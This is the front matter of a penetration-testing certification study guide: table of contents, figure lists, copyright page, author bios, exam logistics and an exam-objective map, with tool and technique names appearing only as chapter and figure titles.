Prepare for success on the new PenTest+ certification exam and an exciting career in penetration testing.

In the revamped Second Edition of CompTIA PenTest+ Study Guide: Exam PT0-002, veteran information security experts Dr. Mike Chapple and David Seidl deliver a comprehensive roadmap to the foundational and advanced skills every pentester (penetration tester) needs to secure their CompTIA PenTest+ certification, ace their next interview, and succeed in an exciting new career in a growing field. You'll learn to perform security assessments of traditional servers, desktop and mobile operating systems, cloud installations, Internet-of-Things devices, and industrial or embedded systems. You'll plan and scope a penetration testing engagement including vulnerability scanning, understand legal and regulatory compliance requirements, analyze test results, and produce a written report with remediation techniques.

This book will:
* Prepare you for success on the newly introduced CompTIA PenTest+ PT0-002 Exam
* Multiply your career opportunities with a certification that complies with ISO 17024 standards and meets Department of Defense Directive 8140/8570.01-M requirements
* Allow access to the Sybex online learning center, with chapter review questions, full-length practice exams, hundreds of electronic flashcards, and a glossary of key terms

Perfect for anyone preparing for the updated CompTIA PenTest+ certification exam, CompTIA PenTest+ Study Guide: Exam PT0-002 is also a must-read resource for aspiring penetration testers and IT security professionals seeking to expand and improve their skillset.
Page count: 842
Publication year: 2021
Cover
Title Page
Copyright
Dedication
Acknowledgments
About the Author
About the Technical Editor
Introduction
CompTIA
The PenTest+ Exam
What Does This Book Cover?
CompTIA PenTest+ Certification Exam Objectives
Assessment Test
Answers to Assessment Test
Chapter 1: Penetration Testing
What Is Penetration Testing?
Reasons for Penetration Testing
Who Performs Penetration Tests?
The CompTIA Penetration Testing Process
The Cyber Kill Chain
Tools of the Trade
Summary
Exam Essentials
Lab Exercises
Review Questions
Chapter 2: Planning and Scoping Penetration Tests
Scoping and Planning Engagements
Penetration Testing Standards and Methodologies
Key Legal Concepts for Penetration Tests
Regulatory Compliance Considerations
Summary
Exam Essentials
Lab Exercises
Review Questions
Chapter 3: Information Gathering
Footprinting and Enumeration
Active Reconnaissance and Enumeration
Information Gathering and Defenses
Summary
Exam Essentials
Lab Exercises
Review Questions
Chapter 4: Vulnerability Scanning
Identifying Vulnerability Management Requirements
Configuring and Executing Vulnerability Scans
Software Security Testing
Developing a Remediation Workflow
Overcoming Barriers to Vulnerability Scanning
Summary
Exam Essentials
Lab Exercises
Review Questions
Chapter 5: Analyzing Vulnerability Scans
Reviewing and Interpreting Scan Reports
Validating Scan Results
Common Vulnerabilities
Summary
Exam Essentials
Lab Exercises
Review Questions
Chapter 6: Exploiting and Pivoting
Exploits and Attacks
Exploitation Toolkits
Exploit Specifics
Leveraging Exploits
Persistence and Evasion
Pivoting
Covering Your Tracks
Summary
Exam Essentials
Lab Exercises
Review Questions
Chapter 7: Exploiting Network Vulnerabilities
Identifying Exploits
Conducting Network Exploits
Exploiting Windows Services
Identifying and Exploiting Common Services
Wireless Exploits
Summary
Exam Essentials
Lab Exercises
Review Questions
Chapter 8: Exploiting Physical and Social Vulnerabilities
Physical Facility Penetration Testing
Social Engineering
Summary
Exam Essentials
Lab Exercises
Review Questions
Chapter 9: Exploiting Application Vulnerabilities
Exploiting Injection Vulnerabilities
Exploiting Authentication Vulnerabilities
Exploiting Authorization Vulnerabilities
Exploiting Web Application Vulnerabilities
Unsecure Coding Practices
Steganography
Application Testing Tools
Summary
Exam Essentials
Lab Exercises
Review Questions
Chapter 10: Attacking Hosts, Cloud Technologies, and Specialized Systems
Attacking Hosts
Credential Attacks and Testing Tools
Remote Access
Attacking Virtual Machines and Containers
Attacking Cloud Technologies
Attacking Mobile Devices
Attacking IoT, ICS, Embedded Systems, and SCADA Devices
Attacking Data Storage
Summary
Exam Essentials
Lab Exercises
Review Questions
Chapter 11: Reporting and Communication
The Importance of Communication
Recommending Mitigation Strategies
Writing a Penetration Testing Report
Wrapping Up the Engagement
Summary
Exam Essentials
Lab Exercises
Review Questions
Chapter 12: Scripting for Penetration Testing
Scripting and Penetration Testing
Variables, Arrays, and Substitutions
Comparison Operations
String Operations
Flow Control
Input and Output (I/O)
Error Handling
Advanced Data Structures
Reusing Code
The Role of Coding in Penetration Testing
Summary
Exam Essentials
Lab Exercises
Review Questions
Appendix A: Answers to Review Questions
Appendix B: Solution to Lab Exercise
Solution to Activity 5.2: Analyzing a CVSS Vector
Index
End User License Agreement
Chapter 1
TABLE 1.1 Penetration testing tools covered by the PenTest+ exam
Chapter 3
TABLE 3.1 Common ports and services
Chapter 5
TABLE 5.1 CVSS attack vector metric
TABLE 5.2 CVSS attack complexity metric
TABLE 5.3 CVSS privileges required metric
TABLE 5.4 CVSS user interaction metric
TABLE 5.5 CVSS confidentiality metric
TABLE 5.6 CVSS integrity metric
TABLE 5.7 CVSS availability metric
TABLE 5.8 CVSS scope metric
TABLE 5.9 CVSS Qualitative Severity Rating Scale
Chapter 6
TABLE 6.1 Metasploit exploit quality ratings
TABLE 6.2 Metasploit search terms
Chapter 1
FIGURE 1.1 The CIA triad
FIGURE 1.2 The DAD triad
FIGURE 1.3 CompTIA penetration testing stages
FIGURE 1.4 The Cyber Kill Chain model
FIGURE 1.5 Cyber Kill Chain in the context of the CompTIA model
Chapter 2
FIGURE 2.1 A logical dataflow diagram
Chapter 3
FIGURE 3.1 ExifTool metadata with location
FIGURE 3.2 FOCA metadata acquisition
FIGURE 3.3 WHOIS query data for google.com
FIGURE 3.4 Host command response for google.com
FIGURE 3.5 nslookup for netflix.com
FIGURE 3.6 WHOIS of 52.41.111.100
FIGURE 3.7 tracert of netflix.com
FIGURE 3.8 Shodan result from an exposed Cisco device
FIGURE 3.9 Censys IOS host view
FIGURE 3.10 A Google search for passwords.xls
FIGURE 3.11 Nmap scan using OS identification
FIGURE 3.12 Nmap output of a Windows 10 system
FIGURE 3.13 Zenmap topology view
FIGURE 3.14 Scapy packet crafting for a TCP ping
FIGURE 3.15 ARP query and response
FIGURE 3.16 Harvesting emails using Metasploit
FIGURE 3.17 Netcat banner grabbing
FIGURE 3.18 Excerpt of strings run on the Netcat binary
Chapter 4
FIGURE 4.1 FIPS 199 Standards
FIGURE 4.2 Qualys asset map
FIGURE 4.3 Configuring a Nessus scan
FIGURE 4.4 Sample Nessus scan report
FIGURE 4.5 Nessus scan templates
FIGURE 4.6 Disabling unused plug‐ins
FIGURE 4.7 Configuring authenticated scanning
FIGURE 4.8 Choosing a scan appliance
FIGURE 4.9 National Cyber Awareness System Vulnerability Summary
FIGURE 4.10 Setting automatic updates in Nessus
FIGURE 4.11 Acunetix web application scan vulnerability report
FIGURE 4.12 Nikto web application scan results
FIGURE 4.13 Running a Wapiti scan
FIGURE 4.14 WPScan WordPress vulnerability scanner
FIGURE 4.15 Nessus web application scanner
FIGURE 4.16 Tamper Data session showing login data
FIGURE 4.17 Scanning a database‐backed application with SQLmap
FIGURE 4.18 Vulnerability management life cycle
FIGURE 4.19 Qualys scan performance settings
Chapter 5
FIGURE 5.1 Nessus vulnerability scan report
FIGURE 5.2 Qualys vulnerability scan report
FIGURE 5.3 OpenVAS vulnerability scan report
FIGURE 5.4 Scan report showing vulnerabilities and best practices
FIGURE 5.5 Vulnerability trend analysis
FIGURE 5.6 Vulnerabilities exploited in 2015 by year of initial discovery...
FIGURE 5.7 Missing patch vulnerability
FIGURE 5.8 Unsupported operating system vulnerability
FIGURE 5.9 Dirty COW website
FIGURE 5.10 Code execution vulnerability
FIGURE 5.11 Spectre and Meltdown dashboard from QualysGuard
FIGURE 5.12 FTP cleartext authentication vulnerability
FIGURE 5.13 Debug mode vulnerability
FIGURE 5.14 Outdated SSL version vulnerability
FIGURE 5.15 Insecure SSL cipher vulnerability
FIGURE 5.16 Invalid certificate warning
FIGURE 5.17 DNS amplification vulnerability
FIGURE 5.18 Internal IP disclosure vulnerability
FIGURE 5.19 Inside a virtual host
FIGURE 5.20 SQL injection vulnerability
FIGURE 5.21 Cross‐site scripting vulnerability
FIGURE 5.22 First vulnerability report
FIGURE 5.23 Second vulnerability report
Chapter 6
FIGURE 6.1 OpenVAS/Greenbone vulnerability report
FIGURE 6.2 Distributed Ruby vulnerability
FIGURE 6.3 phpinfo() output accessible
FIGURE 6.4 phpinfo.php output
FIGURE 6.5 The Metasploit console
FIGURE 6.6 Running show exploits in Metasploit
FIGURE 6.7 Selecting an exploit
FIGURE 6.8 Setting module options
FIGURE 6.9 Successful exploit
FIGURE 6.10 WMImplant WMI tools
FIGURE 6.11 CrackMapExec's main screen
FIGURE 6.12 Responder capture flow
FIGURE 6.13 Pass‐the‐hash flow
FIGURE 6.14 John the Ripper
FIGURE 6.15 Pivoting
Chapter 7
FIGURE 7.1 Double‐tagged Ethernet packet
FIGURE 7.2 Yersinia 802.1q attack selection
FIGURE 7.3 DNS cache poisoning attack
FIGURE 7.4 ARP spoofing
FIGURE 7.5 Manually configuring a MAC address in Windows 10
FIGURE 7.6 Metasploit SYN flood
FIGURE 7.7 NetBIOS name service attack
FIGURE 7.8 Responder sending poisoned answers
FIGURE 7.9 Responder capturing hashes
FIGURE 7.10 Output from snmpwalk
FIGURE 7.11 THC Hydra SSH brute‐force attack
FIGURE 7.12 WiGLE map showing access point density in a metropolitan area
FIGURE 7.13 RFID cloner and tags
Chapter 8
FIGURE 8.1 A typical security vestibule design
FIGURE 8.2 SET menu
FIGURE 8.3 SET loading the Metasploit reverse TCP handler
FIGURE 8.4 BeEF hooked browser detail
FIGURE 8.5 BeEF commands usable in a hooked browser
Chapter 9
FIGURE 9.1 Web application firewall
FIGURE 9.2 Account number input page
FIGURE 9.3 Account information page
FIGURE 9.4 Account information page after blind SQL injection
FIGURE 9.5 Account creation page
FIGURE 9.6 Zyxel router default password
FIGURE 9.7 Session authentication with cookies
FIGURE 9.8 Session cookie from CNN.com
FIGURE 9.9 Session hijacking with cookies
FIGURE 9.10 Kerberos authentication process
FIGURE 9.11 Example web server directory structure
FIGURE 9.12 Directory scanning with DirBuster
FIGURE 9.13 Message board post rendered in a browser
FIGURE 9.14 XSS attack rendered in a browser
FIGURE 9.15 SQL error disclosure
FIGURE 9.16 (a) Unaltered photograph (b) Photograph with hidden message embe...
FIGURE 9.17 Zed Attack Proxy (ZAP)
FIGURE 9.18 Burp Proxy
FIGURE 9.19 The american fuzzy lop performing fuzz testing
FIGURE 9.20 Gobuster DNS enumeration
Chapter 10
FIGURE 10.1 SUID files in Kali
FIGURE 10.2 SUID files with details
FIGURE 10.3 Abusing sudo rights
FIGURE 10.4 Checking Linux kernel version information
FIGURE 10.5 Dumping the Windows SAM with Mimikatz
FIGURE 10.6 Hashcat cracking Linux passwords
FIGURE 10.7 Metasploit reverse TCP shell
FIGURE 10.8 Detecting virtualization on a Windows system
FIGURE 10.9 Detecting virtualization on Kali Linux
FIGURE 10.10 Side‐channel attack against a virtual machine
FIGURE 10.11 A simple SCADA environment design example
Chapter 11
FIGURE 11.1 Smartphone‐based multifactor authentication
Chapter 12
FIGURE 12.1 Executing Hello, World! using JavaScript in the Chrome browser
FIGURE 12.2 Executing the cupcake calculator using JavaScript in the Chrome ...
FIGURE 12.3 URL encoding using JavaScript in the Chrome browser
FIGURE 12.4 Identifying the language of a conditional execution statement
FIGURE 12.5 Identifying the language of a for loop
FIGURE 12.6 Identifying the language of a while loop
FIGURE 12.7 Storing DNS information in a tree data structure
Second Edition
Mike Chapple, David Seidl
Copyright © 2022 by John Wiley & Sons, Inc. All rights reserved.
Published by John Wiley & Sons, Inc., Hoboken, New Jersey.
Published simultaneously in Canada.
ISBN 978-1-119-82381-0
ISBN 978-1-119-82383-4 (ebk.)
ISBN 978-1-119-82382-7 (ebk.)
No part of this publication may be reproduced, stored in a retrieval system, or transmitted in any form or by any means, electronic, mechanical, photocopying, recording, scanning, or otherwise, except as permitted under Section 107 or 108 of the 1976 United States Copyright Act, without either the prior written permission of the Publisher, or authorization through payment of the appropriate per-copy fee to the Copyright Clearance Center, Inc., 222 Rosewood Drive, Danvers, MA 01923, (978) 750-8400, fax (978) 750-4470, or on the web at www.copyright.com. Requests to the Publisher for permission should be addressed to the Permissions Department, John Wiley & Sons, Inc., 111 River Street, Hoboken, NJ 07030, (201) 748-6011, fax (201) 748-6008, or online at http://www.wiley.com/go/permission.
Limit of Liability/Disclaimer of Warranty: The publisher and the author make no representations or warranties with respect to the accuracy or completeness of the contents of this work and specifically disclaim all warranties, including without limitation warranties of fitness for a particular purpose. No warranty may be created or extended by sales or promotional materials. The advice and strategies contained herein may not be suitable for every situation. This work is sold with the understanding that the publisher is not engaged in rendering legal, accounting, or other professional services. If professional assistance is required, the services of a competent professional person should be sought. Neither the publisher nor the author shall be liable for damages arising herefrom. The fact that an organization or Website is referred to in this work as a citation and/or a potential source of further information does not mean that the author or the publisher endorses the information the organization or Website may provide or recommendations it may make. Further, readers should be aware the Internet Websites listed in this work may have changed or disappeared between when this work was written and when it is read.
For general information on our other products and services or for technical support, please contact our Customer Care Department within the United States at (800) 762-2974, outside the United States at (317) 572-3993 or fax (317) 572-4002.
Wiley also publishes its books in a variety of electronic formats. Some content that appears in print may not be available in electronic formats. For more information about Wiley products, visit our web site at www.wiley.com.
Library of Congress Control Number: 2021944464
Trademarks: WILEY, the Wiley logo, Sybex, and the Sybex logo are trademarks or registered trademarks of John Wiley & Sons, Inc. and/or its affiliates, in the United States and other countries, and may not be used without written permission. CompTIA and PenTest+ are trademarks or registered trademarks of The Computing Technology Industry Association, Inc. DBA CompTIA, Inc. All other trademarks are the property of their respective owners.
John Wiley & Sons, Inc. is not associated with any product or vendor mentioned in this book.
Cover image: © Getty Images Inc./Jeremy Woodhouse
Cover design: Wiley
This book is dedicated to Ron Kraemer—a mentor, friend, and wonderful boss.
Books like this involve work from many people, and as authors, we truly appreciate the hard work and dedication that the team at Wiley shows. We would especially like to thank Senior Acquisitions Editor Kenyon Brown. We have worked with Ken on multiple projects and consistently enjoy our work with him.
We also greatly appreciated the editing and production team for the book, including John Sleeva, our project editor, whose prompt and consistent oversight got this book out the door, and Barath Kumar Rajasekaran, our content refinement specialist, who guided us through layouts, formatting, and final cleanup to produce a great book. We'd also like to thank our technical editor, Nadean Tanner, who provided us with thought‐provoking questions and technical insight throughout the process. We would also like to thank the many behind‐the‐scenes contributors, including the graphics, production, and technical teams who make the book and companion materials into a finished product.
Our agent, Carole Jelen of Waterside Productions, continues to provide us with wonderful opportunities, advice, and assistance throughout our writing careers.
Finally, we would like to thank our families, friends, and significant others who support us through the late evenings, busy weekends, and long hours that a book like this requires to write, edit, and get to press.
Mike Chapple, PhD, Security+, CISSP, CISA, PenTest+, CySA+, is a teaching professor of IT, analytics, and operations at the University of Notre Dame. He is also the academic director of the University's master's program in business analytics.
Mike is a cybersecurity professional with over 20 years of experience in the field. Prior to his current role, Mike served as senior director for IT service delivery at Notre Dame, where he oversaw the University's cybersecurity program, cloud computing efforts, and other areas. Mike also previously served as chief information officer of Brand Institute and an information security researcher with the National Security Agency and the U.S. Air Force.
Mike is a frequent contributor to several magazines and websites and is the author or coauthor of more than 25 books, including CISSP Official (ISC)2 Study Guide (Wiley, 2021), CISSP Official (ISC)2 Practice Tests (Wiley, 2021), CompTIA Security+ Study Guide (Wiley, 2020), CompTIA CySA+ Study Guide (Wiley, 2020), CompTIA CySA+ Practice Tests (Wiley, 2020), and Cybersecurity: Information Operations in a Connected World (Jones and Bartlett, 2021).
Mike offers free study groups for the PenTest+, CySA+, Security+, CISSP, and SSCP certifications at his website, certmike.com.
David Seidl, CISSP, PenTest+, is vice president for information technology and CIO at Miami University. During his IT career, he has served in a variety of technical and information security roles, including serving as the senior director for campus technology services at the University of Notre Dame, where he co‐led Notre Dame's move to the cloud and oversaw cloud operations, ERP, databases, identity management, and a broad range of other technologies and services. He also served as Notre Dame's director of information security and led Notre Dame's information security program. He has taught information security and networking undergraduate courses as an instructor for Notre Dame's Mendoza College of Business, and he has written books on security certification and cyberwarfare, including co‐authoring the previous editions of CISSP (ISC)2 Official Practice Tests (Sybex, 2018) as well as CISSP Official (ISC)2 Practice Tests (Wiley, 2021), CompTIA Security+ Study Guide (Wiley, 2020), CompTIA Security+ Practice Tests (Wiley, 2020), CompTIA CySA+ Study Guide (Wiley, 2020), CompTIA CySA+ Practice Tests (Wiley, 2020), Cybersecurity: Information Operations in a Connected World (Jones and Bartlett, 2021), and CompTIA Security+ Practice Tests: Exam SY0‐601, as well as other certification guides and books on information security.
David holds a bachelor's degree in communication technology and a master's degree in information security from Eastern Michigan University, as well as CISSP, CySA+, PenTest+, GPEN, and GCIH certifications.
Nadean Hutto Tanner is the manager of Consulting‐Education Services at FireEye/Mandiant, working most recently on building real‐world cyber‐range engagements to practice threat hunting and incident response. She has been in IT for more than 20 years and in cybersecurity specifically for over a decade. She holds over 30 industry certifications, including CompTIA CASP+ and ISC2 CISSP.
Tanner has trained and consulted for Fortune 500 companies and the U.S. Department of Defense in cybersecurity, forensics, analysis, red/blue teaming, vulnerability management, and security awareness.
She is the author of the Cybersecurity Blue Team Toolkit (Wiley, 2019) and CASP+ Practice Tests: Exam CAS‐003 (Sybex, 2020). She also was the technical editor for the CompTIA Security+ Study Guide: Exam SY0‐601 (Sybex, 2021), written by Mike Chapple and David Seidl.
In her spare time, she enjoys speaking at technical conferences such as Black Hat, Wild West Hacking Fest, and OWASP events.
The CompTIA® PenTest+® Study Guide: Exam PT0‐002, Second Edition provides accessible explanations and real‐world knowledge about the exam objectives that make up the PenTest+ certification. This book will help you to assess your knowledge before taking the exam, as well as provide a stepping‐stone to further learning in areas where you may want to expand your skill set or expertise.
Before you tackle the PenTest+ exam, you should already be a security practitioner. CompTIA suggests that test‐takers should have intermediate‐level skills based on their cybersecurity pathway. You should also be familiar with at least some of the tools and techniques described in this book. You don't need to know every tool, but understanding how to use existing experience to approach a new scenario, tool, or technology that you may not know is critical to passing the PenTest+ exam.
CompTIA is a nonprofit trade organization that offers certification in a variety of IT areas, ranging from the skills that a PC support technician needs, which are covered in the A+ exam, to advanced certifications like the CompTIA Advanced Security Practitioner, or CASP, certification. CompTIA divides its exams into three categories based on the skill level required for the exam and what topics it covers, as shown in the following table:
Beginner/Novice: IT Fundamentals, A+
Intermediate: Network+, Security+, CySA+, PenTest+
Advanced: CASP
CompTIA recommends that practitioners follow a cybersecurity career path that begins with the IT fundamentals and A+ exam and proceeds to include the Network+ and Security+ credentials to complete the foundation. From there, cybersecurity professionals may choose the PenTest+ and/or Cybersecurity Analyst+ (CySA+) certifications before attempting the CompTIA Advanced Security Practitioner (CASP) certification as a capstone credential.
The CySA+ and PenTest+ exams are more advanced exams, intended for professionals with hands‐on experience who also possess the knowledge covered by the prior exams.
CompTIA certifications are ISO and ANSI accredited, and they are used throughout multiple industries as a measure of technical skill and knowledge. In addition, CompTIA certifications, including the Security+ and the CASP, have been approved by the U.S. government as Information Assurance baseline certifications and are included in the State Department's Skills Incentive Program.
The PenTest+ exam is designed to be a vendor‐neutral certification for penetration testers. It is designed to assess current penetration testing, vulnerability assessment, and vulnerability management skills with a focus on network resiliency testing. Successful test‐takers will prove their ability to plan and scope assessments, handle legal and compliance requirements, and perform vulnerability scanning and penetration testing activities using a variety of tools and techniques, and then analyze the results of those activities.
It covers five major domains:
Planning and Scoping
Information Gathering and Vulnerability Scanning
Attacks and Exploits
Reporting and Communication
Tools and Code Analysis
These five areas include a range of subtopics, from scoping penetration tests to performing host enumeration and exploits, while focusing heavily on scenario‐based learning.
The PenTest+ exam fits between the entry‐level Security+ exam and the CompTIA Advanced Security Practitioner (CASP) certification, providing a mid‐career certification for those who are seeking the next step in their certification and career path while specializing in penetration testing or vulnerability management.
The PenTest+ exam is conducted in a format that CompTIA calls “performance‐based assessment.” This means that the exam uses hands‐on simulations using actual security tools and scenarios to perform tasks that match those found in the daily work of a security practitioner. There may be numerous types of exam questions, such as multiple‐choice, fill‐in‐the‐blank, multiple‐response, drag‐and‐drop, and image‐based problems.
CompTIA recommends that test‐takers have three or four years of information security–related experience before taking this exam and that they have taken the Security+ exam or have equivalent experience, including technical, hands‐on expertise. The exam costs $370 in the United States, with roughly equivalent prices in other locations around the globe. More details about the PenTest+ exam and how to take it can be found at:
https://certification.comptia.org/certifications/pentest
A test preparation book like this cannot teach you every possible security software package, scenario, and specific technology that may appear on the exam. Instead, you should focus on whether you are familiar with the type or category of technology, tool, process, or scenario presented as you read the book. If you identify a gap, you may want to find additional tools to help you learn more about those topics.
Additional resources for hands‐on exercises include the following:
Exploit-Exercises.com provides virtual machines, documentation, and challenges covering a wide range of security issues at https://exploit-exercises.com.
Hacking‐Lab provides capture‐the‐flag (CTF) exercises in a variety of fields at https://www.hacking-lab.com/index.html.
The OWASP Hacking Lab provides excellent web application–focused exercises at https://www.owasp.org/index.php/OWASP_Hacking_Lab.
PentesterLab provides subscription‐based access to penetration testing exercises at https://www.pentesterlab.com/exercises.
Since the exam uses scenario‐based learning, expect the questions to involve analysis and thought rather than relying on simple memorization. As you might expect, it is impossible to replicate that experience in a book, so the questions here are intended to help you be confident that you know the topic well enough to think through hands‐on exercises.
Once you are fully prepared to take the exam, you can visit the CompTIA website to purchase your exam voucher:
https://store.comptia.org/Certification-Vouchers/c/11293
CompTIA partners with Pearson VUE's testing centers, so your next step will be to locate a testing center near you. In the United States, you can do this based on your address or your zip code, while non‐U.S. test‐takers may find it easier to enter their city and country. You can search for a test center near you at:
http://www.pearsonvue.com/comptia/locate
Now that you know where you'd like to take the exam, simply set up a Pearson VUE testing account and schedule an exam:
https://home.pearsonvue.com/comptia/onvue
On the day of the test, take two forms of identification, and make sure to show up with plenty of time before the exam starts. Remember that you will not be able to take your notes, electronic devices (including smartphones and watches), or other materials in with you.
In some countries, including the United States, you may be eligible to take the test online from your home or office through the Pearson OnVUE program. For more information on this program and current availability, see:
https://home.pearsonvue.com/Clients/CompTIA/OnVUE-online-proctored.aspx
Once you have taken the exam, you will be notified of your score immediately, so you'll know if you passed the test right away. You should keep track of your score report with your exam registration records and the email address you used to register for the exam. If you've passed, you'll receive a handsome certificate, similar to the one shown here:
CompTIA certifications must be renewed on a periodic basis. To renew your certification, you can either pass the most current version of the exam, earn a qualifying higher‐level CompTIA or industry certification, or complete sufficient continuing education activities to earn enough continuing education units (CEUs) to renew it.
CompTIA provides information on renewals via their website at:
https://certification.comptia.org/continuing-education/how-to-renew
When you sign up to renew your certification, you will be asked to agree to the CE program's Code of Ethics, to pay a renewal fee, and to submit the materials required for your chosen renewal method.
A full list of the industry certifications you can use to acquire CEUs toward renewing the PenTest+ can be found at:
https://certification.comptia.org/continuing-education/choose/renewal-options
This book is designed to cover the five domains included in the PenTest+ exam:
Chapter 1
: Penetration Testing
Learn the basics of penetration testing as you begin an in‐depth exploration of the field. In this chapter, you will learn why organizations conduct penetration testing and the role of the penetration test in a cybersecurity program.
Chapter 2
: Planning and Scoping Penetration Tests
Proper planning is critical to a penetration test. In this chapter, you will learn how to define the rules of engagement, scope, budget, and other details that need to be determined before a penetration test starts. Details of contracts, compliance and legal concerns, and authorization are all discussed so that you can make sure you are covered before a test starts.
Chapter 3: Information Gathering
Gathering information is one of the earliest stages of a penetration test. In this chapter you will learn how to gather open source intelligence (OSINT) via passive means. Once you have OSINT, you can leverage the active scanning and enumeration techniques and tools you will learn about in the second half of the chapter.
Chapter 4: Vulnerability Scanning
Managing vulnerabilities helps to keep your systems secure. In this chapter, you will learn how to conduct vulnerability scans and use them as an important information source for penetration testing.
Chapter 5: Analyzing Vulnerability Scans
Vulnerability reports can contain huge amounts of data about potential problems with systems. In this chapter, you will learn how to read and analyze a vulnerability scan report, what CVSS scoring is and what it means, as well as how to choose the appropriate actions to remediate the issues you have found. Along the way, you will explore common types of vulnerabilities, their impact on systems and networks, and how they might be exploited during a penetration test.
Chapter 6: Exploiting and Pivoting
Once you have a list of vulnerabilities, you can move on to prioritizing the exploits based on the likelihood of success and availability of attack methods. In this chapter, you will explore common attack techniques and tools and when to use them. Once you have gained access, you can pivot to other systems or networks that may not have been accessible previously. You will learn tools and techniques that are useful for lateral movement once you're inside a network's security boundaries, how to cover your tracks, and how to hide the evidence of your efforts.
Chapter 7: Exploiting Network Vulnerabilities
Penetration testers often start with network attacks against common services. In this chapter, you will explore the most frequently attacked services, including NetBIOS, SMB, SNMP, and others. You will learn about on‐path attacks, network‐specific techniques, and how to attack wireless networks and systems.
Chapter 8: Exploiting Physical and Social Vulnerabilities
Humans are the most vulnerable part of an organization's security posture, and penetration testers need to know how to exploit the human element of an organization. In this chapter, you will explore social engineering methods, motivation techniques, and social engineering tools. Once you know how to leverage human behavior, you will explore how to gain and leverage physical access to buildings and other secured areas.
Chapter 9: Exploiting Application Vulnerabilities
Applications are the go‐to starting point for testers and hackers alike. If an attacker can break through the security of a web application and access the back‐end systems supporting that application, they often have the starting point they need to wage a full‐scale attack. In this chapter, we examine many of the application vulnerabilities that are commonly exploited during penetration tests.
Chapter 10: Attacking Hosts, Cloud Technologies, and Specialized Systems
Attacking hosts relies on understanding operating system–specific vulnerabilities for Windows and Linux as well as common problems found on almost all operating systems. In this chapter, you will learn about attack methods used against both Windows and Linux hosts, credential attacks and password cracking, how virtual machines and container attacks work, and attack vectors and techniques used against cloud technologies. You'll also explore attacks against mobile devices, IoT and industrial control systems, data storage, and other specialized systems.
Chapter 11: Reporting and Communication
Penetration tests are only useful to the organization if the penetration testers are able to effectively communicate the state of the organization to management and technical staff. In this chapter, we turn our attention to that crucial final phase of a penetration test: reporting and communicating our results.
Chapter 12: Scripting for Penetration Testing
Scripting languages provide a means to automate the repetitive tasks of penetration testing. Penetration testers do not need to be software engineers. Generally speaking, pentesters don't write extremely lengthy code or develop applications that will be used by many other people. The primary development skill that a penetration tester should acquire is the ability to read fairly simple scripts written in a variety of common languages and adapt them to their own unique needs. That's what we'll explore in this chapter.
Practice Exam
Once you have completed your studies, the practice exam will provide you with a chance to test your knowledge. Use this exam to find places where you may need to study more or to verify that you are ready to tackle the exam. We'll be rooting for you!
Appendix: Answers to Chapter Review Questions
The Appendix has answers to the review questions you will find at the end of each chapter.
The following listing summarizes how the major PenTest+ objective areas map to the chapters in this book. If you want to study a specific domain, this mapping can help you identify where to focus your reading.
Planning and Scoping: Chapters 1, 2
Information Gathering and Vulnerability Scanning: Chapters 3, 4, 5, 6
Attacks and Exploits: Chapters 6, 7, 8, 9, 10
Reporting and Communications: Chapter 11
Tools and Code Analysis: Chapters 3, 4, 5, 6, 7, 8, 9, 10, 11, 12
Later in this introduction you'll find a detailed map showing where every objective topic is covered.
The book is written to build your knowledge as you progress through it, so starting at the beginning is a good idea. Each chapter includes notes on important content and practice questions to help you test your knowledge. Once you are ready, a complete practice test is provided to assess your knowledge.
This study guide uses a number of common elements to help you prepare. These include the following:
Summaries
The summary section of each chapter briefly explains the chapter, allowing you to easily understand what it covers.
Exam Essentials
The exam essentials focus on major exam topics and critical knowledge that you should take into the test. The exam essentials focus on the exam objectives provided by CompTIA.
Chapter Review Questions
A set of questions at the end of each chapter will help you assess your knowledge and whether you are ready to take the exam based on your knowledge of that chapter's topics.
Lab Exercises
The lab exercises provide more in‐depth practice opportunities to expand your skills and to better prepare for performance‐based testing on the PenTest+ exam.
Real‐World Scenarios
The real‐world scenarios included in each chapter tell stories and provide examples of how topics in the chapter look from the point of view of a security professional. They include current events, personal experience, and approaches to actual problems.
The interactive online learning environment that accompanies CompTIA® PenTest+® Study Guide: Exam PT0‐002 Second Edition provides a test bank with study tools to help you prepare for the certification exam—and increase your chances of passing it the first time! The test bank includes the following elements:
Sample Tests
All of the questions in this book are available online, including the assessment test, which you'll find at the end of this introduction, and the chapter tests that include the review questions at the end of each chapter. In addition, there is a practice exam. Use these questions to test your knowledge of the study guide material. The online test bank runs on multiple devices.
Flashcards
Questions are provided in digital flashcard format (a question followed by a single correct answer). You can use the flashcards to reinforce your learning and provide last‐minute test prep before the exam.
Other Study Tools
A glossary of key terms from this book and their definitions is available as a fully searchable PDF.
Go to http://www.wiley.com/go/sybextestprep to register and gain access to this interactive online learning environment and test bank with study tools.
The CompTIA PenTest+ Study Guide has been written to cover every PenTest+ exam objective at a level appropriate to its exam weighting. The following table provides a breakdown of this book's exam coverage, showing you the weight of each section and the chapter where each objective or subobjective is covered.
Domain / Percentage of Exam
1.0 Planning and Scoping: 14%
2.0 Information Gathering and Vulnerability Scanning: 22%
3.0 Attacks and Exploits: 30%
4.0 Reporting and Communication: 18%
5.0 Tools and Code Analysis: 16%
Total: 100%
Exam Objective / Chapter
1.1 Compare and contrast governance, risk, and compliance concepts: Chapter 2
1.2 Explain the importance of scoping and organizational/customer requirements: Chapter 2
1.3 Given a scenario, demonstrate an ethical hacking mindset by maintaining professionalism and integrity: Chapter 1
2.1 Given a scenario, perform passive reconnaissance: Chapter 3
2.2 Given a scenario, perform active reconnaissance: Chapter 3
2.3 Given a scenario, analyze the results of a reconnaissance exercise: Chapter 3
2.4 Given a scenario, perform vulnerability scanning: Chapters 3, 4, 5
    Considerations of vulnerability scanning: Chapter 4
    Scan identified targets for vulnerabilities: Chapters 4, 5
    Set scan settings to avoid detection: Chapter 4
    Scanning methods: Chapters 4, 5
    Nmap: Chapter 3
    Vulnerability testing tools that facilitate automation: Chapters 3, 4
3.1 Given a scenario, research attack vectors and perform network attacks: Chapter 7
3.2 Given a scenario, research attack vectors and perform wireless attacks: Chapter 7
3.3 Given a scenario, research attack vectors and perform application-based attacks: Chapter 9
3.4 Given a scenario, research attack vectors and perform attacks on cloud technologies: Chapter 10
3.5 Explain common attacks and vulnerabilities against specialized systems: Chapter 10
3.6 Given a scenario, perform a social engineering or physical attack: Chapter 8
3.7 Given a scenario, perform post-exploitation techniques: Chapter 6
4.1 Compare and contrast important components of written reports: Chapter 11
4.2 Given a scenario, analyze the findings and recommend the appropriate remediation within a report: Chapter 11
4.3 Explain the importance of communication during the penetration testing process: Chapter 11
4.4 Explain post-report delivery activities: Chapter 11
5.1 Explain the basic concepts of scripting and software development: Chapter 12
